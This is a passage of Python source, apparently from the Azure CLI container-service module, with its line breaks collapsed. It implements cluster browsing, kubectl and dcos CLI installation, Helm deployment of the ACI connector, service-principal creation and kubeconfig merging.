azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes from azure.mgmt.containerservice.v2018_03_31.models import ManagedCluster from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAADProfile from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAgentPoolProfile from azure.mgmt.containerservice.models import OpenShiftManagedClusterAgentPoolProfile from azure.mgmt.containerservice.models import OpenShiftAgentPoolProfileRole from azure.mgmt.containerservice.models import OpenShiftManagedClusterIdentityProvider from azure.mgmt.containerservice.models import OpenShiftManagedClusterAADIdentityProvider from azure.mgmt.containerservice.models import OpenShiftManagedCluster from azure.mgmt.containerservice.models import OpenShiftRouterProfile from azure.mgmt.containerservice.models import OpenShiftManagedClusterAuthProfile from azure.mgmt.containerservice.models import NetworkProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources logger = get_logger(__name__) # pylint:disable=too-many-lines,unused-argument def which(binary): path_var = os.getenv('PATH') if platform.system() == 'Windows': binary = binary + '.exe' parts = path_var.split(';') else: parts = path_var.split(':') for part in parts: bin_path = os.path.join(part, binary) if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK): return bin_path return None def wait_then_open(url): """ Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL. """ for _ in range(1, 10): try: urlopen(url, context=_ssl_context()) except URLError: time.sleep(1) break webbrowser.open_new_tab(url) def wait_then_open_async(url): """ Spawns a thread that waits for a bit then opens a URL. """ t = threading.Thread(target=wait_then_open, args=({url})) t.daemon = True t.start() def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None): """ Opens a browser to the web interface for the cluster orchestrator :param name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file) def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file): orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member if str(orchestrator_type).lower() == 'kubernetes' or \ orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \ (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file) elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos: return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) else: raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type)) def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Launch a proxy and browse the Kubernetes web UI. :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file) def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml') if os.path.exists(browse_path): os.remove(browse_path) _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False) logger.warning('Proxy running on 127.0.0.1:8001/ui') logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1:8001/ui') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"]) def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser. :param name: name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: Path to the SSH key to use :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file): if not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) acs = acs_client.ACSClient() if not acs.connect(_get_host_name(acs_info), _get_username(acs_info), key_filename=ssh_key_file): raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info))) octarine_bin = '/opt/mesosphere/bin/octarine' if not acs.file_exists(octarine_bin): raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin)) proxy_id = _rand_str(16) proxy_cmd = '{} {}'.format(octarine_bin, proxy_id) acs.run(proxy_cmd, background=True) # Parse the output to get the remote PORT proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id) stdout, _ = acs.run(proxy_client_cmd) remote_port = int(stdout.read().decode().strip()) local_port = acs.get_available_local_port() # Set the proxy proxy.set_http_proxy('127.0.0.1', local_port) logger.warning('Proxy running on 127.0.0.1:%s', local_port) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1') try: acs.create_tunnel( remote_host='127.0.0.1', remote_port=remote_port, local_port=local_port) finally: proxy.disable_http_proxy() return def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None): acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member kwargs = {'install_location': install_location} if client_version: kwargs['client_version'] = client_version if orchestrator_type == 'kubernetes': return k8s_install_cli(**kwargs) elif orchestrator_type == 'dcos': return dcos_install_cli(**kwargs) else: raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type)) def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _urlretrieve(url, filename): req = urlopen(url, context=_ssl_context()) with open(filename, "wb") as f: f.write(req.read()) def dcos_install_cli(cmd, install_location=None, client_version='1.8'): """ Downloads the dcos command line from Mesosphere """ system = platform.system() if not install_location: raise CLIError( "No install location specified and it could not be determined from the current platform '{}'".format( system)) base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}' if system == 'Windows': file_url = base_url.format('windows', client_version, 'dcos.exe') elif system == 'Linux': # TODO Support ARM CPU here file_url = base_url.format('linux', client_version, 'dcos') elif system == 'Darwin': file_url = base_url.format('darwin', client_version, 'dcos') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to %s', install_location) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as err: raise CLIError('Connection error while attempting to download client ({})'.format(err)) def k8s_install_cli(cmd, client_version='latest', install_location=None): """Install kubectl, a command-line interface for Kubernetes clusters.""" source_url = "https://storage.googleapis.com/kubernetes-release/release" cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurechinacloud': source_url = 'https://mirror.azure.cn/kubernetes/kubectl' if client_version == 'latest': context = _ssl_context() version = urlopen(source_url + '/stable.txt', context=context).read() client_version = version.decode('UTF-8').strip() else: client_version = "v%s" % client_version file_url = '' system = platform.system() base_url = source_url + '/{}/bin/{}/amd64/{}' # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) if system == 'Windows': file_url = base_url.format(client_version, 'windows', 'kubectl.exe') elif system == 'Linux': # TODO: Support ARM CPU here file_url = base_url.format(client_version, 'linux', 'kubectl') elif system == 'Darwin': file_url = base_url.format(client_version, 'darwin', 'kubectl') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to "%s" from "%s"', install_location, file_url) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group): from subprocess import PIPE, Popen instance = client.get(resource_group_name, name) helm_not_installed = 'Helm not detected, please verify if it is installed.' url_chart = chart_url if image_tag is None: image_tag = 'latest' # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # If SPN is specified, the secret should also be specified if service_principal is not None and client_secret is None: raise CLIError('--client-secret must be specified when --service-principal is specified') # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() # Validate the location upon the ACI avaiable regions _validate_aci_location(norm_location) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) subscription_id = _get_subscription_id(cmd.cli_ctx) # Get the TenantID profile = Profile(cli_ctx=cmd.cli_ctx) _, _, tenant_id = profile.get_login_credentials() # Check if we want the linux connector if os_type.lower() in ['linux', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Linux', instance.enable_rbac, instance.fqdn) # Check if we want the windows connector if os_type.lower() in ['windows', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Windows', instance.enable_rbac, instance.fqdn) def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, os_type, use_rbac, masterFqdn): rbac_install = "true" if use_rbac else "false" node_taint = 'azure.com/aci' helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name k8s_master = 'https://{}'.format(masterFqdn) logger.warning("Deploying the ACI connector for '%s' using Helm", os_type) try: values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format( node_name, node_taint, os_type, image_tag, rbac_install) if service_principal: values += ",env.azureClientId=" + service_principal if client_secret: values += ",env.azureClientKey=" + client_secret if subscription_id: values += ",env.azureSubscriptionId=" + subscription_id if tenant_id: values += ",env.azureTenantId=" + tenant_id if aci_resource_group: values += ",env.aciResourceGroup=" + aci_resource_group if norm_location: values += ",env.aciRegion=" + norm_location # Currently, we need to set the master FQDN. # This is temporary and we should remove it when possible values += ",env.masterUri=" + k8s_master if helm_cmd == "install": subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values]) elif helm_cmd == "upgrade": subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values]) except subprocess.CalledProcessError as err: raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err)) def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, graceful=False, os_type='Linux'): from subprocess import PIPE, Popen helm_not_installed = "Error : Helm not detected, please verify if it is installed." # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() if os_type.lower() in ['linux', 'both']: helm_release_name = connector_name.lower() + '-linux-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) if os_type.lower() in ['windows', 'both']: helm_release_name = connector_name.lower() + '-windows-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) def _undeploy_connector(graceful, node_name, helm_release_name): if graceful: logger.warning('Graceful option selected, will try to drain the node first') from subprocess import PIPE, Popen kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.' try: Popen(["kubectl"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(kubectl_not_installed) try: drain_node = subprocess.check_output( ['kubectl', 'drain', node_name, '--force', '--delete-local-data'], universal_newlines=True) if not drain_node: raise CLIError('Could not find the node, make sure you' + ' are using the correct --os-type') except subprocess.CalledProcessError as err: raise CLIError('Could not find the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) logger.warning("Undeploying the '%s' using Helm", helm_release_name) try: subprocess.call(['helm', 'del', helm_release_name, '--purge']) except subprocess.CalledProcessError as err: raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err)) try: subprocess.check_output( ['kubectl', 'delete', 'node', node_name], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not delete the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. except Exception as ex: # pylint: disable=broad-except logger.info(ex) time.sleep(2 + 2 * x) else: return False hook.add(message='Finished service principal creation', value=1.0, total_val=1.0) logger.info('Finished service principal creation') return service_principal def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0) logger.info('Waiting for AAD role to propagate') for x in range(0, 10): hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0) try: # TODO: break this out into a shared utility library create_role_assignment(cli_ctx, role, service_principal, scope=scope) break except CloudError as ex: if ex.message == 'The role assignment already exists.': break logger.info(ex.message) except: # pylint: disable=bare-except pass time.sleep(delay + delay * x) else: return False hook.add(message='AAD role propagation done', value=1.0, total_val=1.0) logger.info('AAD role propagation done') return True def _get_subscription_id(cli_ctx): _, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None) return sub_id def _get_default_dns_prefix(name, resource_group_name, subscription_id): # Use subscription id to provide uniqueness and prevent DNS name clashes name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10] if not name_part[0].isalpha(): name_part = (str('a') + name_part)[0:10] resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16] return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6]) def list_acs_locations(cmd, client): return { "productionRegions": regions_in_prod, "previewRegions": regions_in_preview } def _generate_windows_profile(windows, admin_username, admin_password): if windows: if not admin_password: raise CLIError('--admin-password is required.') if len(admin_password) < 6: raise CLIError('--admin-password must be at least 6 characters') windows_profile = { "adminUsername": admin_username, "adminPassword": admin_password, } return windows_profile return None def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile): master_pool_profile = {} default_master_pool_profile = { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', } if api_version == "2017-07-01": default_master_pool_profile = _update_dict(default_master_pool_profile, { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', "vmSize": master_vm_size, "osDiskSizeGB": int(master_osdisk_size), "vnetSubnetID": master_vnet_subnet_id, "firstConsecutiveStaticIP": master_first_consecutive_static_ip, "storageProfile": master_storage_profile, }) if not master_profile: master_pool_profile = default_master_pool_profile else: master_pool_profile = _update_dict(default_master_pool_profile, master_profile) return master_pool_profile def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile): agent_pool_profiles = [] default_agent_pool_profile = { "count": int(agent_count), "vmSize": agent_vm_size, "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', } if api_version == "2017-07-01": default_agent_pool_profile = _update_dict(default_agent_pool_profile, { "count": int(agent_count), "vmSize": agent_vm_size, "osDiskSizeGB": int(agent_osdisk_size), "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', "vnetSubnetID": agent_vnet_subnet_id, "ports": agent_ports, "storageProfile": agent_storage_profile, }) if agent_profiles is None: agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"})) else: # override agentPoolProfiles by using the passed in agent_profiles for idx, ap in enumerate(agent_profiles): # if the user specified dnsPrefix, we honor that # otherwise, we use the idx to avoid duplicate dns name a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap) agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a)) return agent_pool_profiles def _generate_outputs(name, orchestrator_type, admin_username): # define outputs outputs = { "masterFQDN": { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long }, "sshMaster0": { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long }, } if orchestrator_type.lower() != "kubernetes": outputs["agentFQDN"] = { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long } # override sshMaster0 for non-kubernetes scenarios outputs["sshMaster0"] = { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long } return outputs def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile): properties = { "orchestratorProfile": { "orchestratorType": orchestrator_type, }, "masterProfile": master_pool_profile, "agentPoolProfiles": agent_pool_profiles, "linuxProfile": { "ssh": { "publicKeys": [ { "keyData": ssh_key_value } ] }, "adminUsername": admin_username }, } if api_version == "2017-07-01": properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version if windows_profile is not None: properties["windowsProfile"] = windows_profile return properties # pylint: disable=too-many-locals def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None, location=None, admin_username="azureuser", api_version=None, master_profile=None, master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="", master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="", agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0, agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="", orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None, windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument validate=False, no_wait=False): """Create a new Acs. :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param deployment_name: The name of the deployment. :type deployment_name: str :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of the domain name and the regionalized DNS zone make up the fully qualified domain name associated with the public IP address. :type dns_name_prefix: str :param name: Resource name for the container service. :type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. :type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, "location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name, template, params, validate, no_wait) except CloudError as ex: retry_exception = ex if 'is not valid according to the validation procedure' in ex.message or \ 'The credentials in ServicePrincipalProfile were invalid' in ex.message or \ 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def store_acs_service_principal(subscription_id, client_secret, service_principal, file_name='acsServicePrincipal.json'): obj = {} if client_secret: obj['client_secret'] = client_secret if service_principal: obj['service_principal'] = service_principal config_path = os.path.join(get_config_dir(), file_name) full_config = load_service_principals(config_path=config_path) if not full_config: full_config = {} full_config[subscription_id] = obj with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600), 'w+') as spFile: json.dump(full_config, spFile) def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'): config_path = os.path.join(get_config_dir(), file_name) config = load_service_principals(config_path) if not config: return None return config.get(subscription_id) def load_service_principals(config_path): if not os.path.exists(config_path): return None fd = os.open(config_path, os.O_RDONLY) try: with os.fdopen(fd) as f: return shell_safe_json_parse(f.read()) except: # pylint: disable=bare-except return None def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait, subscription_id=None): from azure.mgmt.resource.resources import ResourceManagementClient from azure.mgmt.resource.resources.models import DeploymentProperties properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental') smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments if validate: logger.info('==== BEGIN TEMPLATE ====') logger.info(json.dumps(template, indent=2)) logger.info('==== END TEMPLATE ====') return smc.validate(resource_group_name, deployment_name, properties) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties) def k8s_get_credentials(cmd, client, name, resource_group_name, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), ssh_key_file=None, overwrite_existing=False): """Download and install kubectl credentials from the cluster master :param name: The name of the cluster. :type name: str :param resource_group_name: The name of the resource group. :type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if not addition[key]: return if existing[key] is None: existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: from knack.prompting import prompt_y_n, NoTTYException msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?' overwrite = False try: overwrite = prompt_y_n(msg.format(i['name'])) except NoTTYException: pass if overwrite: existing[key].remove(j) else: msg = 'A different object named {} already exists in {} in your kubeconfig file.' raise CLIError(msg.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) else: raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise 